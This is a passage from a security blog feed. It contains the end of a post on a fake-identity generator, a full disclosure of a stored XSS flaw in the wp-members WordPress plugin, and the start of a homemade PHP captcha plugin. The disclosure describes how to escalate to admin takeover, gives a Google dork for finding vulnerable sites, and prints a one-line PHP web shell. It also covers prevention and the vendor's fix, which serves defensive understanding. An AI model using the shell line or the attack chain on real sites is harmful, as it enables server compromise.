    <span class="n">identity</span> <span class="o">=</span> <span class="n">scrape_identity</span><span class="p">()</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Generated a random and anonymous identity:'</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">identity</span><span class="p">:</span>
        <span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="se">\t</span><span class="si">{0:.<20}{1}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">e</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">e</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
</code></pre></div>
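<p>Since <code>scrape_identity()</code> returns a plain list of (name, value) tuples, building your own logic on top of it is straightforward. The following is only a sketch: <code>identity_to_dict()</code> and <code>format_identity()</code> are hypothetical helpers that are not part of the repository, and the sample data is taken from the example output shown in this post.</p>

```python
def identity_to_dict(pairs):
    """Turn [(name, value), ...] into a dict for keyed access."""
    return dict(pairs)


def format_identity(pairs, width=20):
    """Render each pair like anon_identity() does, without the leading tab.

    The name is left-aligned and padded with dots up to `width` characters.
    """
    return ['{0:.<{2}}{1}'.format(name, value, width) for name, value in pairs]


# Sample data in the shape scrape_identity() is described to return.
sample = [('full_name', 'Kyle M. Cuevas'), ('blood_group', 'A+')]

for line in format_identity(sample):
    print(line)
print(identity_to_dict(sample)['blood_group'])
```

<p>A dict is handy when you only need single fields, while the list of tuples keeps the order in which the fields were scraped.</p>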
<p>You can use my work like this:</p>
<div class="highlight"><pre><span></span><code>$ git clone https://github.com/NikolaiT/anonymous_identity
$ <span class="nb">cd</span> anonymous_identity
$ python3
Python <span class="m">3</span>.2.3 <span class="o">(</span>default, Oct <span class="m">19</span> <span class="m">2012</span>, <span class="m">19</span>:53:16<span class="o">)</span>
<span class="o">[</span>GCC <span class="m">4</span>.7.2<span class="o">]</span> on linux2
Type <span class="s2">"help"</span>, <span class="s2">"copyright"</span>, <span class="s2">"credits"</span> or <span class="s2">"license"</span> <span class="k">for</span> more information.
>>> from identity_generator import anon_identity
>>> anon_identity<span class="o">()</span>
<span class="o">[</span>+<span class="o">]</span> Generated a random and anonymous identity:
full_name...........Kyle M. Cuevas
address.............1136 Ethels Lane
phone_number........863-703-6140
mother_maiden_name..Powell
birthdate...........August <span class="m">2</span>, <span class="m">1994</span>
blood_group.........A+
weight..............70.0 kilograms
height..............186 centimeters
>>>
</code></pre></div>No 1. - wp-members: Interesting peristant XSS leading to remote code execution.2013-03-15T23:12:00+01:002013-03-15T23:12:00+01:00Nikolai Tschachertag:incolumitas.com,2013-03-15:/2013/03/15/no-1-wp-members-interesting-peristant-xss-leading-to-remote-code-execution/<p>Hey you there!</p>
<p><strong>Type:</strong> Stored cross site scripting<br>
<strong>Risk:</strong> Medium to high<br>
<strong>Affecting:</strong> <a href="http://wordpress.org/extend/plugins/wp-members/">http://wordpress.org/extend/plugins/wp-members/</a><br>
<strong>Vendor site:</strong> <a href="http://rocketgeek.com">http://rocketgeek.com</a></p>
<h3>Preface</h3>
<p>It has been quite some time since I last took care of my blog, although I
would have had some content ready (maybe even worth publishing).
Around six weeks ago, I rummaged (wow - new word!) through endless lines
of WordPress plugin code, in the hope of getting my hands on some
low-hanging fruit (in the likely case you don't have a clue what I am
talking about: I was searching for easily detectable security bugs in
plugins written for WordPress). After spending several
hours analysing the architecture and design of a randomly chosen target -
<a href="http://wordpress.org/extend/plugins/wp-members/">wp-members</a>, a plugin
that lets the site owner password protect
content on his WordPress site - I was able to detect a pretty nasty bug.</p>
<h3>The bug</h3>
<p>Alongside the access restriction mechanism, the plugin also
allows users to register. The potential user is presented with a nice form,
which transfers an array of registration data to the web server
when submitted. Considering this, there is only one possible
source of tainted data. The PHP file
handling the registration logic is, unsurprisingly, called
wp-members-register.php. The vulnerable wp-members version can be found
<a href="http://downloads.wordpress.org/plugin/wp-members.2.8.0.zip">here</a> (zip
file of the most recent vulnerable version).</p>
<p>The aforementioned wp-members-register.php file contains an
unsound function named <code>wpmem_registration( $toggle )</code>, which was
affected by two kinds of XSS flaws: a reflected and a persistent (or
stored) XSS vulnerability. Whereas the reflected one isn't really dangerous
(modern browsers easily spot them and filter them out by recognizing
script tags and HTML entities in the URL), the persistent one, on the other
hand, might become rather unpleasant.</p>
<p>This first code snippet shows the preparation of the input and some
parsing. We learn that the input is written into an associative array
named <code>$fields</code>.</p>
<div class="highlight"><pre><span></span><code><span class="x">// build array of the posts</span>
<span class="x">$wpmem_fields = get_option( 'wpmembers_fields' );</span>
<span class="x">for( $row = 0; $row < count( $wpmem_fields ); $row++ ) {</span>
<span class="x"> $wpmem_fieldval_arr[$row] = $_POST[$wpmem_fields[$row][2]];</span>
<span class="x"> // add for _data hooks</span>
<span class="x"> if( $wpmem_fields[$row][2] != 'password' && $wpmem_fields[$row][4] == 'y' ) {</span>
<span class="x"> $fields[$wpmem_fields[$row][2]] = $wpmem_fieldval_arr[$row];</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>The program logic continues with some checks for obligatory data:</p>
<div class="highlight"><pre><span></span><code><span class="x">// check for required fields </span>
<span class="x">$wpmem_fields_rev = array_reverse( $wpmem_fields );</span>
<span class="x">$wpmem_fieldval_arr_rev = array_reverse( $wpmem_fieldval_arr );</span>
<span class="x">for( $row = 0; $row < count($wpmem_fields); $row++ ) {</span>
<span class="x"> $pass_chk = ( $toggle == 'update' && $wpmem_fields_rev[$row][2] == 'password' ) ? true : false;</span>
<span class="x"> if( $wpmem_fields_rev[$row][5] == 'y' && $pass_chk == false ) {</span>
<span class="x"> if( !$wpmem_fieldval_arr_rev[$row] ) { $wpmem_themsg = sprintf( __('Sorry, %s is a required field.', 'wp-members'), $wpmem_fields_rev[$row][1] ); }</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Then we find ourselves in a big switch statement which makes up the
whole remainder of the function. It basically consists of two cases:
register and update. Since we are only interested in the register
functionality, we ignore the update branch.</p>
<p>Now the coder implements some countermeasures against injection attacks.
He checks whether the supplied username already exists, whether it consists of
valid characters and so on. When one of these checks fails, the script
refuses to continue. It does essentially the same with the
supplied email address.</p>
<div class="highlight"><pre><span></span><code><span class="x">if( !$username ) { $wpmem_themsg = __( 'Sorry, username is a required field', 'wp-members' ); return $wpmem_themsg; exit(); } </span>
<span class="x">if( !validate_username( $username ) ) { $wpmem_themsg = __( 'The username cannot include non-alphanumeric characters.', 'wp-members' ); return $wpmem_themsg; exit(); }</span>
<span class="x">if( !is_email( $user_email) ) { $wpmem_themsg = __( 'You must enter a valid email address.', 'wp-members' ); return $wpmem_themsg; exit(); }</span>
<span class="x">if( $wpmem_themsg ) { return "empty"; exit(); }</span>
<span class="x">if( username_exists( $username ) ) { return "user"; exit(); } </span>
<span class="x">if( email_exists( $user_email ) ) { return "email"; exit(); }</span>
</code></pre></div>
<p>At this point, our <code>$fields</code> array is only partly sanitized; the rest is still
populated with arbitrary raw data we are able to control.</p>
<div class="highlight"><pre><span></span><code><span class="k">Array</span><span class="w"></span>
<span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">username</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"> </span><span class="n">SANITIZED</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">user_email</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="nv">@uuuuuuuu</span><span class="p">.</span><span class="n">com</span><span class="w"> </span><span class="n">SANITIZED</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">first_name</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">last_name</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">addr1</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">addr2</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">city</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">thestate</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">zip</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">country</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">phone1</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="p">)</span><span class="w"></span>
</code></pre></div>
<p>We finally come to the first part of the vulnerability. The raw POST
data is inserted into the database through the WordPress API function
<code>update_user_meta()</code>.</p>
<div class="highlight"><pre><span></span><code><span class="x">// set remaining fields to wp_usermeta table</span>
<span class="x">for( $row = 0; $row < count( $wpmem_fields ); $row++ ) {</span>
<span class="x"> if( $wpmem_fields[$row][2] != 'password' ) {</span>
<span class="x"> if( $wpmem_fields[$row][2] == 'user_url' ) { // if the field is user_url, it goes in the wp_users table</span>
<span class="x"> wp_update_user( array ( 'ID' => $user_id, 'user_url' => $wpmem_fieldval_arr[$row] ) );</span>
<span class="x"> } else {</span>
<span class="x"> if( $wpmem_fields[$row][2] != 'user_email' ) { // email is already done above, so if it's not email...</span>
<span class="x"> if( $wpmem_fields[$row][4] == 'y' ) { // are we using this field?</span>
<span class="x"> update_user_meta( $user_id, $wpmem_fields[$row][2], $wpmem_fieldval_arr[$row] );</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Unfortunately, this family of WordPress API functions
(<code>update_user_meta()</code>) doesn't strip HTML metacharacters (no
<code>htmlspecialchars()</code> functionality!). Maybe the author assumed that it
would.</p>
<p>However, now we know that we can insert arbitrary data (thus also HTML
and JavaScript code) into the database. This is nothing special or even
insecure yet, because the application could still sanitize the data when
retrieving it from the database and processing it further. Unfortunately
this doesn't happen.</p>
<p>Well. My next idea was to look at the admin panel. I mean,
this panel may show the tainted user data in a table or something
similar. And that's what it does:</p>
<p>A WordPress administrator can access the wp-members plugin
via the general admin panel => Plugins => Users => WP-members. There
he sees a table overview of all registered users. The corresponding URL
for this view is
http://localhost/wp/wp-admin/users.php?page=wpmem-users (<em>localhost/wp</em>
is my document root in this case...)</p>
<p>Well, the table consists of 5 columns:</p>
<div class="highlight"><pre><span></span><code>Username
Name
E-mail
Phone
Country
</code></pre></div>
<p>Remember that our investigation revealed that we are able to insert
HTML/JavaScript into the database for the Name, Phone and Country fields?
Let's check where this admin panel is generated and whether the data is
sanitized:</p>
<p>The view is generated by the function <code>wpmem_admin_users()</code> in the
/wp-content/plugins/wp-members/user.php file. The actual
value submitted at registration time is then echoed to the page at line
261.<br>
Excerpt:</p>
<div class="highlight"><pre><span></span><code><span class="x">echo " ID}&" . esc_attr( stripslashes( $_SERVER['REQUEST_URI'] ) ) . "\">" . $user->user_login . "\n";</span>
<span class="x">echo " \n";</span>
<span class="x">echo " " . get_user_meta( $user->ID, 'first_name', 'true' ) . " " . get_user_meta( $user->ID, 'last_name', 'true' ) . "\n";</span>
<span class="x">echo " " . $user->user_email . "\n";</span>
<span class="x"> if( $col_phone == true ) {</span>
<span class="x">echo " " . get_user_meta( $user->ID, 'phone1', 'true' ) . "\n";</span>
<span class="x"> }</span>
<span class="x"> if( $col_country == true ) {</span>
<span class="x">echo " " . get_user_meta( $user->ID, 'country', 'true' ) . "\n";</span>
<span class="x"> }</span>
</code></pre></div>
<p>The value isn't properly escaped, neither at the time it is inserted
into the database, nor when it is read back with <code>get_user_meta()</code>. Maybe the
coder thought that <code>get_user_meta()</code> is XSS safe?!</p>
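<p>The missing step is escaping on output. The plugin is written in PHP, and in WordPress the usual tool for this would be <code>esc_html()</code>; the following Python sketch only illustrates the principle. <code>render_user_row()</code> and the sample values are hypothetical, and the escaping itself is done by <code>html.escape()</code> from the standard library.</p>

```python
import html


def render_user_row(meta):
    """Build one table row, escaping every stored value right before output."""
    cells = (meta.get(key, '') for key in ('first_name', 'phone1', 'country'))
    return '<tr>' + ''.join(
        '<td>{0}</td>'.format(html.escape(cell)) for cell in cells
    ) + '</tr>'


# The phone field carries markup, as an attacker would submit it at registration.
row = render_user_row({
    'first_name': 'Kyle',
    'phone1': '<b onmouseover=alert(1)>x</b>',
    'country': 'US',
})
print(row)
```

<p>Escaping at output time means it no longer matters what ended up in the database: the browser receives the markup as inert text.</p>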
<p>The code is only triggered when a user with a field containing the
exploit code is shown in the admin table. This is normally not the case,
because there is a vast number of users and they are distributed
over many pages in the panel. Why does that not reduce the threat level of
the attack vector?<br>
Users are listed in alphabetical order in the admin panel, according to
the username submitted at registration. So with a username like
'aaaaaaaaaaaaaaa' (though of course a less suspicious one) we can
make sure that we are shown (echoed) on the first page! This
means our exploit code is always triggered when the admin accesses the
plugin panel, so the chances of exploitation are pretty good!</p>
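<p>The effect of the alphabetical ordering can be sketched in a few lines. This assumes a case-insensitive sort and a fixed page size, neither of which I verified against the plugin; <code>first_page()</code> and the usernames are made up for illustration.</p>

```python
def first_page(usernames, per_page=10):
    """Return the usernames shown on page one of an alphabetical listing."""
    return sorted(usernames, key=str.lower)[:per_page]


users = ['mallory', 'zed', 'bob', 'aaron', 'aaaaaaaaaaaaaaa', 'carol']

# With two users per page, the crafted name still lands on page one.
print(first_page(users, per_page=2))
```

<p>However many users register, a name that sorts before all others stays on the first page.</p>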
<h3>How would a blackhat design the exploit?</h3>
<p>The submitted data shouldn't look suspicious; no suspicion at all should
be aroused (sneaky stealth mode enabled). The JavaScript code
shouldn't take long to execute or alter the front end. The code
must be as robust as possible, should be obfuscated and of course well
tested!<br>
Wikipedia says:</p>
<blockquote>
<p>The persistent (or stored) XSS vulnerability is a more devastating
variant of a cross-site scripting flaw: it occurs when the data provided
by the attacker is saved by the server, and then permanently displayed
on "normal" pages returned to other users in the course of regular
browsing, without proper HTML escaping. </p>
</blockquote>
<p>When the payload is triggered, we automatically have the admin cookie.
So we could steal the cookie and send it to the attacker's server to log
in from there and upload a shell. This is way too strenuous and
verbose, so we directly manipulate an existing plugin via the built-in
plugin editor of WordPress. The nonce is no further problem, since we
can simply read it (XSS defeats XSRF prevention!). At execution time
the exploit could send a little notification message to our server, and
then the blackhat knows that his shell is ready for him to access.</p>
<h3>How can we find vulnerable sites including the plugin?</h3>
<p>Google dork of wp-members:</p>
<blockquote>
<p>This content is restricted to site members.</p>
</blockquote>
<p>I recently published a Python script to scan pages with Google:
<a href="http://incolumitas.com/2013/01/06/googlesearch-a-rapid-python-class-to-get-search-results">http://incolumitas.com/2013/01/06/googlesearch-a-rapid-python-class-to-get-search-results</a><br>
We could scan pages with the above dork and find lots of sites with the
vulnerable plugin installed.</p>
<h3>The consequences</h3>
<p>On every server where wp-members is installed and registration
is open (which is the normal case, since a sane website never refuses
users ^^), a malicious user can register with valid data (to pass
the registration checks) plus the exploit code in the
<em>phone</em> or <em>country</em> field of the registration form.<br>
Whenever an admin looks at the user overview in the wp-members admin
panel, the injected code is executed. Because the JavaScript code
runs in the context of the admin, the code is absolutely TRUSTED (stored
XSS): the code can perform any action the WordPress admin panel provides.
For example: change the PHP code of another plugin via the standard
edit function provided in the WordPress admin panel
(/wp/wp-admin/plugin-editor.php) to something like</p>
<div class="highlight"><pre><span></span><code><span class="x">/* Bet you get the idea */</span>
<span class="cp"><?php</span>
<span class="k">echo</span> <span class="nb">system</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>and gain a remote shell on the server. This means the server is fully
compromised (at least http/sql). No need to crack salted MD5 hashes,
as with boring SQL injections. Direct RCE.</p>
<p>The plugin currently has 271,196 downloads (242,142 when I found the
bug 6 weeks ago), 600 downloads on a daily basis. I estimate the number
of servers that actually installed the plugin at around 30,000 (this is
actually a very modest guess). Due to the nature of the flaw,
I guess that a determined blackhat could find 80% of all vulnerable
servers through spiders. Furthermore, modestly guessing, on 30% of these
servers the exploit would be triggered. This makes: <code>0.8 * 0.3 * 30,000 = 7,200</code>. After
adjusting downwards, realistically 5,000 servers could be compromised
(shell access) within a short period of time (a few days to a week).
These servers could act as a neat DoS botnet; servers have lots of
networking power, don't they?</p>
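<p>The back-of-the-envelope estimate can be reproduced in a few lines of Python. The inputs are the guesses from the paragraph above, not measurements, and <code>estimate_compromised</code> is just an illustrative name:</p>

```python
def estimate_compromised(installs: int, findable_pct: int, triggered_pct: int) -> int:
    """Apply both percentages to the install base using integer arithmetic."""
    # Share of installations a spider could locate.
    findable = installs * findable_pct // 100
    # Share of those where an admin actually opens the user table.
    return findable * triggered_pct // 100


print(estimate_compromised(30_000, 80, 30))  # prints 7200
```

<p>Integer percentages are used here only to avoid floating-point rounding noise in the result.</p>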
<h3>Prevention</h3>
<p>Sanitizing untrusted data. It's always the same story. Whether it's
command execution, buffer overflows, SQL injections or XSS, there is one
simple approach to choke off the root of the problem: only allow data
into the application that matches a whitelist. This
sounds easy, and indeed it is, but under the financial pressure of greedy
organizations and general coding stress, security is often ignored and
missed.</p>
<p>On the technical side: apply <code>htmlspecialchars()</code> to the <code>$fields[]</code> array in
wp-members-register.php.<br>
Apply <code>htmlspecialchars()</code> to every piece of data the user is able to manipulate and
craft!</p>
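<p>To make the whitelist idea concrete, here is a small Python sketch of input validation for the two fields mentioned above. The phone pattern and the country list are assumptions made up for illustration; the real plugin's field formats may differ, and validation like this complements output escaping rather than replacing it:</p>

```python
import re

# Hypothetical whitelist rules, chosen only for this example.
PHONE_RE = re.compile(r"\+?[0-9 ()/-]{3,20}")
ALLOWED_COUNTRIES = {"Germany", "Switzerland", "United States"}


def is_valid_phone(value: str) -> bool:
    """Accept only digits and a few common phone separators."""
    return PHONE_RE.fullmatch(value) is not None


def is_valid_country(value: str) -> bool:
    """Accept only countries from a fixed, known list."""
    return value in ALLOWED_COUNTRIES


print(is_valid_phone("+49 (0)30 1234567"))          # prints True
print(is_valid_phone("<script>alert(1)</script>"))  # prints False
print(is_valid_country("Germany"))                  # prints True
```

<p>Anything that does not match is rejected at registration time, so markup never reaches the database in the first place.</p>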
<h3>Last words</h3>
<p>This was only the most gaping flaw; the others (yeah, they exist) became
rather uninteresting, since I already had a way to get on the server.
Chad Butler, the author, fixed the bugs very quickly and professionally.
He took all my suggestions/concerns very seriously and it was generally a
nice experience working with him!</p>Another WordPress captcha implementation2013-01-25T22:01:00+01:002013-01-25T22:01:00+01:00Nikolai Tschachertag:incolumitas.com,2013-01-25:/2013/01/25/how-to-make-your-own-little-captcha-in-php/<h3>Hey dear readership and dudelmatz :)</h3>
<p>I'm kinda overworked, and I planned quite a while ago to release my own
little captcha implementation to stop the massive bulk of spam
comments I receive on a daily basis: it's obnoxious to scroll through
this sheer amount of spam comments and delete them. You can't just
mass-trash them, because you might miss a legit comment, so you
need to check every single one. I assume spammers count on this
expected behaviour of a blogger and exploit it.</p>
<p>So I needed to put a stop to this violation of my spare time and I
created my own captcha. Of course, I first searched for a working and
already existing solution (and I am sure there are many which are better
than what I came up with), but the one I used is basically
<a href="http://wordpress.org/extend/plugins/captcha/">crap</a>.</p>
<p>Its plugin description states:</p>
<blockquote>
<p><em>Captcha plugin allows you to protect your website from spam using
math logic which can be used for login, registration, reseting
password, comments forms.</em></p>
</blockquote>
<p>And yeah, as I feared, this simple, elegant captcha is worthless, because
math logic is a joke for computers (=> spam scripts) to parse and solve. I
was pissed and in the mood to write my first WordPress plugin, so I wrote my
own from scratch.</p>
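<p>To illustrate why plain arithmetic offers little protection, here is a minimal Python sketch. It assumes the question is rendered as plain text with digits and a single operator, which is a simplification and not necessarily how that plugin prints its questions; <code>solve</code> is a hypothetical helper:</p>

```python
import operator
import re

# Supported operators for this illustration.
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}


def solve(question: str) -> int:
    """Extract 'a op b' from the text and compute the result."""
    match = re.search(r"(\d+)\s*([+\-*])\s*(\d+)", question)
    if match is None:
        raise ValueError("no arithmetic expression found")
    left, op, right = match.groups()
    return OPS[op](int(left), int(right))


print(solve("7 + 5 = ?"))  # prints 12
```

<p>One regular expression and a lookup table are enough, which is the whole problem with this kind of challenge.</p>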
<p>Well, I need to warn you: my solution is designed to work only on this
site, because it wouldn't be all too hard to crack it and bypass its
deception. But this won't happen, because there's no reason to: this site
is far from having the critical traffic (not yet) that would make it
interesting for a spammer to circumvent the captcha.</p>
<p>Well enough said, you can see the plugin in action on this site (see the
comments section). Here's the source:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="cm">/*</span>
<span class="cm">Plugin Name: CunningCaptcha</span>
<span class="cm">Plugin URI: http://incolumitas.com</span>
<span class="cm">Description: Simple/easy captcha to prevent spam at commenting.</span>
<span class="cm">Version: 0.1</span>
<span class="cm">Author: Nikolai</span>
<span class="cm">Author URI: http://incolumitas.com</span>
<span class="cm">License: GPLv2 or later</span>
<span class="cm">*/</span>
<span class="cm">/* Copyright 2013 Nikolai (email : admin@incolumitas.com)</span>
<span class="cm"> This program is free software; you can redistribute it and/or modify</span>
<span class="cm"> it under the terms of the GNU General Public License, version 2, as </span>
<span class="cm"> published by the Free Software Foundation.</span>
<span class="cm"> This program is distributed in the hope that it will be useful,</span>
<span class="cm"> but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="cm"> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="cm"> GNU General Public License for more details.</span>
<span class="cm"> You should have received a copy of the GNU General Public License</span>
<span class="cm"> along with this program; if not, write to the Free Software</span>
<span class="cm"> Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA</span>
<span class="cm">*/</span>
<span class="cm">/*</span>
<span class="cm"> * A really simplistic approach to eliminate my spam problem on my</span>
<span class="cm"> * website. Generates a captcha consisting of 4 figures and inserts</span>
<span class="cm"> * some noise to prevent it from being cracked by skids.</span>
<span class="cm"> * I think the effort of cracking it wouldn't take longer than 3 hours</span>
<span class="cm"> * for an intermediate programmer. Its effectiveness lies in the captcha's</span>
<span class="cm"> * uniqueness. Generally, security by obfuscation is a bad idea. At least I </span>
<span class="cm"> * know that :) When somebody tries to crack it, I will harden it. As long</span>
<span class="cm"> * as you give up...</span>
<span class="cm"> */</span>
<span class="c1">// http://wpengineer.com/2214/adding-input-fields-to-the-comment-form/</span>
<span class="c1">// http://wpengineer.com/2205/comment-form-hooks-visualized/</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"CCAPTCHA_DEBUG"</span><span class="p">,</span> <span class="k">false</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">CCAPTCHA_DEBUG</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">error_reporting</span><span class="p">(</span><span class="k">E_ALL</span><span class="p">);</span>
<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'display_errors'</span><span class="p">,</span> <span class="k">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"FIGURE_SIZE"</span><span class="p">,</span> <span class="mi">30</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"NUM_BRUSH_CHANGES_MAX"</span><span class="p">,</span> <span class="mi">3</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"PPM_FILE"</span><span class="p">,</span> <span class="nx">plugin_dir_path</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">)</span><span class="o">.</span><span class="s2">"gen.ppm"</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"CAPTCHA_PNG"</span><span class="p">,</span> <span class="nx">plugin_dir_path</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">)</span><span class="o">.</span><span class="s2">"captcha.png"</span><span class="p">);</span>
<span class="cm">/* Apply intercepting logic with wordpress API */</span>
<span class="c1">// Set a filter to add additional input fields for the comment</span>
<span class="nx">add_filter</span><span class="p">(</span><span class="s1">'comment_form_defaults'</span><span class="p">,</span> <span class="s1">'ccaptcha_comment_form_defaults'</span><span class="p">);</span>
<span class="c1">// Add a filter to verify if the captcha was correct</span>
<span class="nx">add_filter</span><span class="p">(</span><span class="s1">'preprocess_comment'</span><span class="p">,</span> <span class="s1">'ccaptcha_check'</span><span class="p">);</span>
<span class="c1">// Add an action hook to add the additional field to the db</span>
<span class="nx">add_action</span><span class="p">(</span><span class="s1">'comment_post'</span><span class="p">,</span> <span class="s1">'ccaptcha_save_input'</span><span class="p">);</span>
<span class="k">function</span> <span class="nf">ccaptcha_save_input</span><span class="p">(</span><span class="nv">$comment_id</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">add_comment_meta</span><span class="p">(</span><span class="nv">$comment_id</span><span class="p">,</span>
<span class="s1">'ccaptcha'</span><span class="p">,</span> <span class="nb">strip_tags</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'ccaptcha'</span><span class="p">]));</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">ccaptcha_check</span><span class="p">(</span><span class="nv">$commentdata</span><span class="p">)</span> <span class="p">{</span>
<span class="k">global</span> <span class="nv">$current_user</span><span class="p">;</span>
<span class="nx">get_currentuserinfo</span><span class="p">();</span>
<span class="nv">$uid</span> <span class="o">=</span> <span class="nv">$current_user</span><span class="o">-></span><span class="na">ID</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$uid</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'ccaptcha'</span><span class="p">]))</span>
<span class="nx">wp_die</span><span class="p">(</span><span class="nx">__</span><span class="p">(</span><span class="s1">'Error: You need to enter the captcha.'</span><span class="p">));</span>
<span class="nv">$answer</span> <span class="o">=</span> <span class="nb">strip_tags</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'ccaptcha'</span><span class="p">]);</span>
<span class="nv">$generated</span> <span class="o">=</span> <span class="nx">get_option</span><span class="p">(</span><span class="s1">'ccaptcha'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">strcasecmp</span><span class="p">(</span><span class="nv">$answer</span><span class="p">,</span> <span class="nv">$generated</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="nx">wp_die</span><span class="p">(</span><span class="nx">__</span><span class="p">(</span><span class="s1">'Error: Your supplied captcha is incorrect.'</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$commentdata</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/*</span>
<span class="cm"> * Create the captcha and store the string in the database.</span>
<span class="cm"> */</span>
<span class="k">function</span> <span class="nf">ccaptcha_comment_form_defaults</span><span class="p">(</span><span class="nv">$default</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$answer</span> <span class="o">=</span> <span class="nb">implode</span><span class="p">(</span><span class="s1">''</span><span class="p">,</span> <span class="nx">ccaptcha_generate</span><span class="p">());</span>
<span class="c1">// Well, that is ugly, but how else?</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">get_option</span><span class="p">(</span><span class="s1">'ccaptcha'</span><span class="p">))</span>
<span class="nx">add_option</span><span class="p">(</span><span class="s1">'ccaptcha'</span><span class="p">,</span> <span class="nv">$answer</span><span class="p">);</span>
<span class="k">else</span>
<span class="nx">update_option</span><span class="p">(</span><span class="s1">'ccaptcha'</span><span class="p">,</span> <span class="nv">$answer</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">is_user_logged_in</span><span class="p">())</span> <span class="p">{</span>
<span class="nv">$default</span><span class="p">[</span><span class="s1">'fields'</span><span class="p">][</span><span class="s1">'email'</span><span class="p">]</span> <span class="o">.=</span>
<span class="s1">'<img id="captcha_image" src="'</span><span class="o">.</span><span class="nx">__</span><span class="p">(</span><span class="nx">plugin_dir_url</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">))</span><span class="o">.</span><span class="s1">'captcha.png"></span>
<span class="s1"> <p class="comment-form-captcha"></span>
<span class="s1"> <label for="captcha">'</span><span class="o">.</span><span class="nx">__</span><span class="p">(</span><span class="s1">'Captcha'</span><span class="p">)</span><span class="o">.</span> <span class="s1">'</label></span>
<span class="s1"> <input id="ccaptcha" name="ccaptcha" size="30" type="text" /></p>'</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$default</span><span class="p">;</span>
<span class="p">}</span>
<span class="sd">/*** CunningCaptcha Logic begins ***/</span>
<span class="k">function</span> <span class="nf">ccaptcha_generate</span><span class="p">()</span> <span class="p">{</span>
